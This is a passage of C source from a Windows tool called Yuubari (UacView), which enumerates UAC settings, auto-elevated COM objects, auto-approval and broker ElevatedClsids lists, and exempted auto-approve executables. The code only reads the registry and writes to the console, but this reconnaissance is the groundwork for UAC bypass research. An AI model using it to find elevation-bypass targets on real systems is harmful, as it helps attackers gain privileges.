NULL, NULL, NULL, NULL);\n\n                            if (lRet == ERROR_SUCCESS) {\n                                //if found, query the name\n                                dwDataSize = 0;\n                                lpAppIdName = supReadKeyString(hAppIdKey, TEXT(\"\"), &dwDataSize);\n                            }\n                            RegCloseKey(hAppIdKey);\n                        }\n                    }\n                    supHeapFree(t);\n                }\n\n                //\n                // Write output\n                //\n                RtlSecureZeroMemory(&Data, sizeof(Data));\n\n     
           if (lpName) {\n                    Data.Name = lpName;\n                }\n                else {\n                    Data.Name = TEXT(\"undefined\");\n                }\n\n                if (lpAppIdName) {\n                    Data.AppId = lpAppIdName;\n                }\n                else {\n                    if (lpAppId) {\n                        Data.AppId = lpAppId;\n                    }\n                    else {\n                        Data.AppId = TEXT(\"undefined\");\n                    }\n                }\n\n                if (lpLocalizedString) {\n                    Data.LocalizedString = lpLocalizedString;\n                }\n                else {\n                    Data.LocalizedString = TEXT(\"undefined\");\n                }\n\n                Data.Key = (LPWSTR)supQueryKeyName(RootKey, NULL);\n\n                if (VirtualFactory)\n                    Data.DataType = UacCOMDataVirtualFactory;\n                else\n                    Data.DataType = UacCOMDataCommonType;\n\n                OutputCallback((PVOID)&Data);\n\n                if (Data.Key) {\n                    supHeapFree(Data.Key);\n                }\n\n                //\n                // Output virtual server objects.\n                //\n                if (VirtualFactory) {\n\n                    lRet = RegQueryInfoKey(hServerObjectsKey, NULL, NULL, NULL, NULL, NULL, NULL,\n                        &cValues, &cMaxLength, NULL, NULL, NULL);\n\n                    if (lRet == ERROR_SUCCESS) {\n\n                        cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n                        lpValue = (LPWSTR)supHeapAlloc(cMaxLength);\n                        if (lpValue) {\n\n                            for (i = 0; i < cValues; i++) {\n                                cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));\n                                if (RegEnumValue(hServerObjectsKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == 
ERROR_SUCCESS) {\n\n                                    if (CLSIDFromString(lpValue, &clsid) == S_OK) {\n                                        LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n                                        if (LookupInterface) {\n\n                                            CopRunOutputCallbackForInterface(\n                                                UacCOMDataInterfaceTypeVF,\n                                                LookupInterface,\n                                                clsid,\n                                                OutputCallback);\n\n                                        }\n                                    }\n                                }\n                            }\n\n                            supHeapFree(lpValue);\n                        }\n                    }\n                    RegCloseKey(hServerObjectsKey);\n                }\n\n\n            } while (FALSE);\n\n            if (lpAppIdName)\n                supHeapFree(lpAppIdName);\n\n            if (lpAppId != NULL)\n                supHeapFree(lpAppId);\n\n            if (lpName != NULL)\n                supHeapFree(lpName);\n\n            if (lpLocalizedString != NULL)\n                supHeapFree(lpLocalizedString);\n        }\n        else {\n            CopScanRegistry(hSubKey, OutputCallback, InterfaceList);\n        }\n        RegCloseKey(hSubKey);\n    }\n}\n\n/*\n* CopEnumSubKey\n*\n* Purpose:\n*\n* Enumerate key subkeys, check elevation flag.\n*\n*/\nVOID CopEnumSubKey(\n    _In_ HKEY hKey,\n    _In_ DWORD dwKeyIndex,\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    BOOL    bElevation = FALSE;\n    LRESULT lRet;\n    DWORD   dwcbName = 32 * 1024, cch; //initial buffer size, doubled on ERROR_MORE_DATA\n    LPTSTR  lpKeyName = NULL;\n\n    do {\n        lpKeyName = (LPTSTR)supHeapAlloc(dwcbName);\n        if (lpKeyName == NULL)\n            break;\n\n        cch = dwcbName / sizeof(WCHAR);\n        lRet = RegEnumKeyEx(hKey, dwKeyIndex,\n            lpKeyName, &cch, NULL, 
NULL, NULL, NULL);\n        if (lRet == ERROR_MORE_DATA) {\n            dwcbName *= 2;\n            supHeapFree(lpKeyName);\n            lpKeyName = NULL;\n            continue;\n        }\n        if (lRet == ERROR_SUCCESS) {\n            //skip wow64 shit\n            if (_strcmpi(lpKeyName, TEXT(\"Wow6432Node\")) == 0)\n                break;\n\n            if (_strcmpi(lpKeyName, TEXT(\"Elevation\")) == 0)\n                bElevation = TRUE;\n\n            CopQuerySubKey(hKey, lpKeyName, bElevation, OutputCallback, InterfaceList);\n        }\n\n    } while (lRet == ERROR_MORE_DATA);\n\n    if (lpKeyName != NULL)\n        supHeapFree(lpKeyName);\n\n}\n\n/*\n* CopScanRegistry\n*\n* Purpose:\n*\n* Recursively scan registry looking for autoelevated COM entries.\n*\n*/\nVOID CopScanRegistry(\n    _In_ HKEY RootKey,\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    HKEY    hKey = NULL;\n    LRESULT lRet;\n    DWORD   dwcSubKeys = 0, i;\n\n    do {\n        //open root key for enumeration\n        lRet = RegOpenKeyEx(RootKey, NULL, 0, KEY_READ, &hKey);\n        if ((lRet != ERROR_SUCCESS) || (hKey == NULL))\n            break;\n\n        //query subkeys count\n        lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwcSubKeys,\n            NULL, NULL, NULL, NULL, NULL, NULL, NULL);\n\n        if ((lRet != ERROR_SUCCESS) || (dwcSubKeys == 0))\n            break;\n\n        for (i = 0; i < dwcSubKeys; i++)\n            CopEnumSubKey(hKey, i, OutputCallback, InterfaceList);\n\n    } while (FALSE);\n\n    if (hKey != NULL)\n        RegCloseKey(hKey);\n}\n\n/*\n* CoEnumInterfaces\n*\n* Purpose:\n*\n* Remember list of available interfaces, excluding IUnknown.\n*\n*/\nBOOL CoEnumInterfaces(\n    _Inout_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    BOOL        bResult = FALSE;\n    HKEY        hKey = NULL;\n    LRESULT     lRet;\n    RPC_STATUS  RpcStatus = 0;\n    LPWSTR      lpKeyName = NULL;\n    SIZE_T      k;\n    DWORD     
  i, cSubKeys = 0, cMaxLength = 0, cchKey;\n    IID         iid;\n\n    INTERFACE_INFO *infoBuffer = NULL;\n\n    __try {\n\n        lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, TEXT(\"Interface\"), 0, KEY_READ, &hKey);\n        if (lRet != ERROR_SUCCESS)\n            __leave;\n\n        lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,\n            NULL, NULL, NULL, NULL, NULL);\n        if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))\n            __leave;\n\n        if (cSubKeys > 0xFFFF) {\n            __leave;\n        }\n\n        infoBuffer = (INTERFACE_INFO*)supHeapAlloc(cSubKeys * sizeof(INTERFACE_INFO));\n        if (infoBuffer == NULL)\n            __leave;\n\n        cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n        lpKeyName = (LPWSTR)supHeapAlloc(cMaxLength);\n        if (lpKeyName == NULL)\n            __leave;\n\n        for (k = 0, i = 0; i < cSubKeys; i++) {\n\n            cchKey = (DWORD)(cMaxLength / sizeof(WCHAR));\n            if (RegEnumKeyEx(hKey, i, lpKeyName, &cchKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n\n                if (IIDFromString(lpKeyName, &iid) == S_OK) {\n\n                    //skip IUnknown\n                    if (UuidCompare((UUID*)&iid, (UUID*)&IID_IUnknown, &RpcStatus) == 0)\n                        continue;\n\n                    cchKey = MAX_PATH * sizeof(WCHAR);\n                    infoBuffer[k].iid = iid;\n\n                    RegGetValue(hKey, lpKeyName, TEXT(\"\"), RRF_RT_REG_SZ, NULL,\n                        (LPWSTR)&infoBuffer[k].szInterfaceName, &cchKey);\n\n                    k++;\n\n                    if (k >= cSubKeys)\n                        break;\n                }\n            }\n        }\n        InterfaceList->cEntries = (ULONG)k;\n        InterfaceList->List = infoBuffer;\n        bResult = TRUE;\n    }\n    __finally {\n        if (hKey)\n            RegCloseKey(hKey);\n\n        if (lpKeyName)\n            supHeapFree(lpKeyName);\n\n        //release the interface buffer if it was not handed to the caller\n        if (!bResult && infoBuffer)\n            supHeapFree(infoBuffer);\n    }\n\n    return 
bResult;\n}\n\n/*\n* CoScanBrokerApprovalList\n*\n* Purpose:\n*\n* Query list of autoapproval COM objects used by OOBE ICreateObject interface.\n*\n*/\nVOID CoScanBrokerApprovalList(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    HKEY    hKey = NULL, hSubKey = NULL;\n    LRESULT lRet;\n    LPWSTR  lpSubKey = NULL;\n    DWORD   i, cSubKeys = 0, cMaxLength = 0, cchSubKey, dwType, dwData, cbData;\n\n    CLSID clsid;\n\n    INTERFACE_INFO *LookupInterface;\n\n    __try {\n\n        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_BROKER_APPROVAL_LIST, 0, KEY_READ, &hKey);\n        if (lRet != ERROR_SUCCESS)\n            __leave;\n\n        lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, &cSubKeys, &cMaxLength, NULL,\n            NULL, NULL, NULL, NULL, NULL);\n        if ((lRet != ERROR_SUCCESS) || (cSubKeys == 0))\n            __leave;\n\n        cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n        lpSubKey = (LPWSTR)supHeapAlloc(cMaxLength);\n        if (lpSubKey == NULL)\n            __leave;\n\n        for (i = 0; i < cSubKeys; i++) {\n            cchSubKey = (DWORD)(cMaxLength / sizeof(WCHAR));\n            if (RegEnumKeyEx(hKey, i, lpSubKey, &cchSubKey, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n\n                //\n                // Check AutoElevationAllowed\n                //\n                if (RegOpenKey(hKey, lpSubKey, &hSubKey) == ERROR_SUCCESS) {\n\n                    dwType = REG_DWORD;\n                    cbData = sizeof(DWORD);\n                    dwData = 0;\n\n                    if (RegQueryValueEx(hSubKey,\n                        TEXT(\"AutoElevationAllowed\"),\n                        0,\n                        &dwType,\n                        (LPBYTE)&dwData,\n                        &cbData) == ERROR_SUCCESS)\n                    {\n                        if ((cbData == sizeof(DWORD)) && (dwData == 1)) {\n\n                            //\n                            // Find 
interface and output to the callback.\n                            //\n                            if (CLSIDFromString(lpSubKey, &clsid) == S_OK) {\n                                LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n                                if (LookupInterface) {\n\n                                    CopRunOutputCallbackForInterface(\n                                        UacCOMDataInterfaceType,\n                                        LookupInterface,\n                                        clsid,\n                                        OutputCallback);\n                                }\n                            }\n                        }\n                    }\n\n                    RegCloseKey(hSubKey);\n                }\n\n            }\n        }\n\n    }\n    __finally {\n\n        if (hKey)\n            RegCloseKey(hKey);\n\n        if (lpSubKey)\n            supHeapFree(lpSubKey);\n\n    }\n}\n\n/*\n* CoScanAutoApprovalList\n*\n* Purpose:\n*\n* Query list of autoapproval COM objects.\n* This key was added in RS1 specially for consent.exe comfort\n*\n*/\nVOID CoScanAutoApprovalList(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    HKEY    hKey = NULL;\n    LRESULT lRet;\n    LPWSTR  lpValue = NULL;\n    DWORD   i, cValues = 0, cMaxLength = 0, cchValue;\n\n    CLSID clsid;\n\n    INTERFACE_INFO *LookupInterface;\n\n    __try {\n\n        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_UAC_COM_AUTOAPPROVAL_LIST, 0, KEY_READ, &hKey);\n        if (lRet != ERROR_SUCCESS)\n            __leave;\n\n        lRet = RegQueryInfoKey(hKey, NULL, NULL, NULL, NULL, NULL, NULL,\n            &cValues, &cMaxLength, NULL, NULL, NULL);\n        if ((lRet != ERROR_SUCCESS) || (cValues == 0))\n            __leave;\n\n        cMaxLength = (DWORD)((cMaxLength + 1) * sizeof(WCHAR));\n        lpValue = (LPWSTR)supHeapAlloc(cMaxLength);\n        if (lpValue == NULL)\n            __leave;\n\n 
       for (i = 0; i < cValues; i++) {\n            cchValue = (DWORD)(cMaxLength / sizeof(WCHAR));\n            if (RegEnumValue(hKey, i, lpValue, &cchValue, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) {\n                if (CLSIDFromString(lpValue, &clsid) == S_OK) {\n                    LookupInterface = CopLocateInterfaceByCLSID(InterfaceList, clsid);\n                    if (LookupInterface) {\n\n                        CopRunOutputCallbackForInterface(\n                            UacCOMDataInterfaceType,\n                            LookupInterface,\n                            clsid,\n                            OutputCallback);\n\n                    }\n                }\n            }\n        }\n    }\n    __finally {\n\n        if (hKey)\n            RegCloseKey(hKey);\n\n        if (lpValue)\n            supHeapFree(lpValue);\n\n    }\n}\n\n/*\n* CoListInformation\n*\n* Purpose:\n*\n* Scan registry looking for autoelevated COM.\n*\n*/\nVOID CoListInformation(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList\n)\n{\n    if (OutputCallback) {\n        CopScanRegistry(HKEY_CLASSES_ROOT, OutputCallback, InterfaceList);\n    }\n}\n"
  },
  {
    "path": "Source/Yuubari/comobj.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2019\n*\n*  TITLE:       COMOBJ.H\n*\n*  VERSION:     1.45\n*\n*  DATE:        22 Oct 2019\n*\n*  Header file for the COM registry objects scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define UacCOMDataCommonType         0\n#define UacCOMDataInterfaceType      1\n#define UacCOMDataInterfaceTypeVF    2\n#define UacCOMDataVirtualFactory     3\n\ntypedef struct _INTERFACE_INFO {\n    IID iid;\n    WCHAR szInterfaceName[MAX_PATH];\n} INTERFACE_INFO, *PINTERFACE_INFO;\n\ntypedef struct _INTERFACE_INFO_LIST {\n    ULONG cEntries;\n    INTERFACE_INFO *List;\n} INTERFACE_INFO_LIST, *PINTERFACE_INFO_LIST;\n\ntypedef struct _UAC_INTERFACE_DATA {\n    DWORD DataType;\n    LPWSTR Name;\n    CLSID Clsid;\n    IID IID;\n} UAC_INTERFACE_DATA, *PUAC_INTERFACE_DATA;\n\ntypedef struct _UAC_REGISTRY_DATA {\n    DWORD DataType;\n    LPWSTR Name;\n    LPWSTR Key;\n    LPWSTR AppId;\n    LPWSTR LocalizedString;\n} UAC_REGISTRY_DATA, *PUAC_REGISTRY_DATA;\n\nVOID CoListInformation(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList);\n\nBOOL CoEnumInterfaces(\n    _Inout_ INTERFACE_INFO_LIST *InterfaceList);\n\nVOID CoScanAutoApprovalList(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList);\n\nVOID CoScanBrokerApprovalList(\n    _In_ OUTPUTCALLBACK OutputCallback,\n    _In_ INTERFACE_INFO_LIST *InterfaceList);\n"
  },
  {
    "path": "Source/Yuubari/consts.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2026\n*\n*  TITLE:       CONSTS.H\n*\n*  VERSION:     1.61\n*\n*  DATE:        12 Feb 2026\n*\n*  Global consts definition file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define YUUBARI_MIN_SUPPORTED_NT_BUILD NT_WIN7_RTM\n#define YUUBARI_MAX_SUPPORTED_NT_BUILD NT_WIN11_24H2\n\n#define T_UAC_COM_AUTOAPPROVAL_LIST    TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\UAC\\\\COMAutoApprovalList\") //RS1+\n#define T_UAC_BROKER_APPROVAL_LIST     TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CloudExperienceHost\\\\Broker\\\\ElevatedClsids\")\n#define T_UAC_SETTINGS_KEY             TEXT(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\")\n#define T_UAC_PROMPT_BEHAVIOR          TEXT(\"ConsentPromptBehaviorAdmin\")\n#define T_UAC_SECURE_DESKTOP           TEXT(\"PromptOnSecureDesktop\")\n#define T_UAC_RESTRICTED_AUTOAPPROVE   TEXT(\"EnableRestrictedAutoApprove\") //RS1+\n#define T_UAC_AUTOAPPROVEIC            TEXT(\"EnableAutoApproveIntegrityContinuity\") //RS2+, AipAutoApproveHardeningPolicy\n#define T_UAC_AUTOAPPROVEMP            TEXT(\"AutoApproveMitigationPolicy\") //RS2+, AipAutoApproveHardeningPolicy\n#define T_UAC_AUTOAPPROVEHARDCLAIMS    TEXT(\"AutoApproveHardeningClaims\") //RS2+, AipMarkAutoApprovedToken(TokenSecurityAttributes)\n#define T_UAC_ENABLESECUREUIPATHS      TEXT(\"EnableSecureUIAPaths\") //RS2+, Only elevate UIAccess applications that are installed in secure locations\n\n#define T_FLAG_ELEVATION_ENABLED       TEXT(\"ElevationEnabled\")\n#define T_FLAG_VIRTUALIZATION_ENABLED  
TEXT(\"VirtualizationEnabled\")\n#define T_FLAG_INSTALLERDETECT_ENABLED TEXT(\"InstallerDetectEnabled\")\n\n#define T_PROGRAM_NAME                 TEXT(\"Yuubari\")\n#define T_PROGRAM_TITLE                TEXT(\"[UacView] UAC information gathering tool, v1.6.1 (Feb 12, 2026)\\r\\n\")\n\n#define T_HELP\tTEXT(\"Optional parameters to execute: \\r\\n\\n\\\nYUUBARI [/v] \\r\\n\\n\\\n  /v - produce verbose output.\")\n\n#define T_SPLIT TEXT(\"===============================================================\")\n#define T_BASIC_HEAD TEXT(\"\\r\\n[UacView] Basic UAC settings\\r\\n\")\n#define T_COM_HEAD TEXT(\"\\r\\n[UacView] Autoelevated COM objects\\r\\n\")\n#define T_COM_APPROVE_HEAD TEXT(\"\\r\\n[UacView] COMAutoApproval list\\r\\n\")\n#define T_BROKER_APPROVE_HEAD TEXT(\"\\r\\n[UacView] Broker approval list\\r\\n\")\n#define T_WINFILES_HEAD TEXT(\"\\r\\n[UacView] Autoelevated applications in Windows directory\\r\\n\")\n#define T_PFDIRFILES_HEAD TEXT(\"\\r\\n[UacView] Autoelevated applications in Program Files directory\\r\\n\")\n#define T_APPINFO_HEAD TEXT(\"\\r\\n[UacView] Appinfo data\\r\\n\")\n"
  },
  {
    "path": "Source/Yuubari/cui.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n*  TITLE:       CUI.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n*  Console output.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nHANDLE g_ConOut = NULL, g_ConIn = NULL;\nBOOL   g_ConsoleOutput = FALSE;\nWCHAR  g_BE = 0xFEFF;\nconst SIZE_T MAX_CONSOLE_OUTPUT = 4096;\n\n\n/*\n* cuiInitialize\n*\n* Purpose:\n*\n* Initialize console input/output.\n*\n*/\nVOID cuiInitialize(\n    _In_ BOOL InitInput,\n    _Out_opt_ PBOOL IsConsoleOutput\n)\n{\n    ULONG dummy;\n\n    g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n    if (g_ConOut == INVALID_HANDLE_VALUE || g_ConOut == NULL) {\n        g_ConOut = GetStdHandle(STD_ERROR_HANDLE);\n    }\n\n    if (InitInput) {\n        g_ConIn = GetStdHandle(STD_INPUT_HANDLE);\n        if (g_ConIn == INVALID_HANDLE_VALUE) {\n            g_ConIn = NULL;\n        }\n    }\n\n    g_ConsoleOutput = TRUE;\n\n    if (g_ConOut != INVALID_HANDLE_VALUE && g_ConOut != NULL) {\n        SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n\n        if (!GetConsoleMode(g_ConOut, &dummy)) {\n            g_ConsoleOutput = FALSE;\n            WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);\n        }\n    }\n    else {\n        g_ConsoleOutput = FALSE;\n    }\n\n    if (IsConsoleOutput)\n        *IsConsoleOutput = g_ConsoleOutput;\n\n    return;\n}\n\n/*\n* cuiClrScr\n*\n* Purpose:\n*\n* Clear screen.\n*\n*/\nVOID cuiClrScr(\n    VOID\n)\n{\n    COORD coordScreen;\n    DWORD cCharsWritten;\n    DWORD dwConSize;\n    CONSOLE_SCREEN_BUFFER_INFO csbi;\n\n    
coordScreen.X = 0;\n    coordScreen.Y = 0;\n\n    if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))\n        return;\n\n    dwConSize = csbi.dwSize.X * csbi.dwSize.Y;\n\n    if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),\n        dwConSize, coordScreen, &cCharsWritten))\n        return;\n\n    if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))\n        return;\n\n    if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,\n        dwConSize, coordScreen, &cCharsWritten))\n        return;\n\n    SetConsoleCursorPosition(g_ConOut, coordScreen);\n}\n\n/*\n* cuiPrintTextA\n*\n* Purpose:\n*\n* Output text to the console or file.\n* ANSI version.\n*\n*/\nVOID cuiPrintTextA(\n    _In_ LPSTR lpText,\n    _In_ BOOL UseReturn\n)\n{\n    BOOL writeSuccess;\n    DWORD bytesIO;\n    SIZE_T consoleIO, bufferSize, copySize;\n    LPSTR Buffer;\n\n    if (lpText == NULL)\n        return;\n\n    consoleIO = _strlen_a(lpText);\n    if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)\n        return;\n\n    if (UseReturn) {\n        bufferSize = consoleIO + 3;\n    }\n    else {\n        bufferSize = consoleIO + 1;\n    }\n\n    if (bufferSize > MAX_CONSOLE_OUTPUT)\n        return;\n\n    Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);\n    if (Buffer) {\n        copySize = min(bufferSize - 1, consoleIO);\n        memcpy(Buffer, lpText, copySize);\n        Buffer[copySize] = '\\0';\n\n        if (UseReturn) _strcat_a(Buffer, \"\\r\\n\");\n\n        consoleIO = _strlen_a(Buffer);\n\n        if (g_ConsoleOutput != FALSE) {\n            writeSuccess = WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n        }\n        else {\n            writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n        }\n\n        HeapFree(GetProcessHeap(), 0, Buffer);\n    }\n}\n\n/*\n* cuiPrintTextW\n*\n* Purpose:\n*\n* Output text to the console or file.\n* UNICODE version.\n*\n*/\nVOID cuiPrintTextW(\n    _In_ LPWSTR 
lpText,\n    _In_ BOOL UseReturn\n)\n{\n    BOOL writeSuccess;\n    DWORD bytesIO;\n    SIZE_T consoleIO, bufferSize, copySize;\n    LPWSTR Buffer;\n\n    if (lpText == NULL)\n        return;\n\n    consoleIO = _strlen_w(lpText);\n    if (consoleIO == 0 || consoleIO > MAX_CONSOLE_OUTPUT)\n        return;\n\n    if (UseReturn) {\n        bufferSize = (consoleIO + 3) * sizeof(WCHAR);\n    }\n    else {\n        bufferSize = (consoleIO + 1) * sizeof(WCHAR);\n    }\n\n    if (bufferSize > MAX_CONSOLE_OUTPUT * sizeof(WCHAR))\n        return;\n\n    Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);\n    if (Buffer) {\n        copySize = min(bufferSize / sizeof(WCHAR) - 1, consoleIO);\n        memcpy(Buffer, lpText, copySize * sizeof(WCHAR));\n        Buffer[copySize] = L'\\0';\n\n        if (UseReturn) _strcat_w(Buffer, TEXT(\"\\r\\n\"));\n\n        consoleIO = _strlen_w(Buffer);\n\n        if (g_ConsoleOutput != FALSE) {\n            writeSuccess = WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n        }\n        else {\n            writeSuccess = WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);\n        }\n\n        HeapFree(GetProcessHeap(), 0, Buffer);\n    }\n}\n\n/*\n* cuiPrintTextLastErrorA\n*\n* Purpose:\n*\n* Output LastError translated code to the console or file.\n* ANSI version.\n*\n*/\nVOID cuiPrintTextLastErrorA(\n    _In_ BOOL UseReturn\n)\n{\n    CHAR szTextBuffer[1024];\n    DWORD dwLastError = GetLastError();\n\n    RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));\n    if (FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,\n        (LPSTR)&szTextBuffer, sizeof(szTextBuffer) - 64, NULL) == 0)\n    {\n        _strcpy_a(szTextBuffer, \"Error code: \");\n        itostr_a(dwLastError, _strend_a(szTextBuffer));\n    }\n    cuiPrintTextA(szTextBuffer, UseReturn);\n}\n\n/*\n* cuiPrintTextLastErrorW\n*\n* Purpose:\n*\n* Output LastError translated 
code to the console or file.\n* UNICODE version.\n*\n*/\nVOID cuiPrintTextLastErrorW(\n    _In_ BOOL UseReturn\n)\n{\n    WCHAR szTextBuffer[1024];\n    DWORD dwLastError = GetLastError();\n\n    RtlSecureZeroMemory(szTextBuffer, sizeof(szTextBuffer));\n    if (FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT,\n        (LPWSTR)&szTextBuffer, (sizeof(szTextBuffer) / sizeof(WCHAR)) - 64, NULL) == 0)\n    {\n        _strcpy_w(szTextBuffer, TEXT(\"Error code: \"));\n        itostr_w(dwLastError, _strend_w(szTextBuffer));\n    }\n\n    cuiPrintTextW(szTextBuffer, UseReturn);\n}\n"
  },
  {
    "path": "Source/Yuubari/cui.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2018\n*\n*  TITLE:       CUI.H\n*\n*  VERSION:     1.30\n*\n*  DATE:        01 Aug 2018\n*\n*  Common header file for console ui.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID cuiInitialize(\n    _In_ BOOL InitInput,\n    _Out_opt_ PBOOL IsConsoleOutput\n    );\n\n#ifdef _UNICODE\n#define cuiPrintText cuiPrintTextW\n#define cuiPrintTextLastError cuiPrintTextLastErrorW\n#else\n#define cuiPrintText cuiPrintTextA\n#define cuiPrintTextLastError cuiPrintTextLastErrorA\n#endif\n\n\nVOID cuiPrintTextA(\n    _In_ LPSTR lpText,\n    _In_ BOOL UseReturn\n    );\n\nVOID cuiPrintTextW(\n\t_In_ LPWSTR lpText,\n\t_In_ BOOL UseReturn\n\t);\n\nVOID cuiPrintTextLastErrorA(\n    _In_ BOOL UseReturn\n    );\n\nVOID cuiPrintTextLastErrorW(\n    _In_ BOOL UseReturn\n    );\n\nVOID cuiClrScr(\n    VOID\n    );\n"
  },
  {
    "path": "Source/Yuubari/fusion.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n*  TITLE:       FUSION.C\n*\n*  VERSION:     1.61\n*\n*  DATE:        12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nptrWTGetSignatureInfo WTGetSignatureInfo = NULL;\n\n/*\n* IsExemptedAutoApproveEXE\n*\n* Purpose:\n*\n* Check if the given file is Exempted AutoApprove EXE.\n*\n*/\nBOOLEAN IsExemptedAutoApproveEXE(\n    _In_ LPWSTR lpFileName,\n    _In_ HANDLE hFile)\n{\n    SIGNATURE_INFO sigData;\n    NTSTATUS status;\n\n    LPWSTR lpName = _filename(lpFileName);\n\n    if ((_strcmpi(lpName, L\"sysprep.exe\") == 0) ||\n        (_strcmpi(lpName, L\"inetmgr.exe\") == 0))\n    {\n        RtlSecureZeroMemory(&sigData, sizeof(sigData));\n        sigData.cbSize = sizeof(sigData);\n        status = WTGetSignatureInfo(lpFileName, hFile,\n            SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,\n            &sigData,\n            NULL, NULL);\n        if (NT_SUCCESS(status))\n            return ((sigData.SignatureState == SIGNATURE_STATE_VALID) && (sigData.fOSBinary != FALSE));\n    }\n\n    return FALSE;\n}\n\n/*\n* SxsGetTocHeaderFromActivationContext\n*\n* Purpose:\n*\n* Locate and return pointer to Toc header in activation 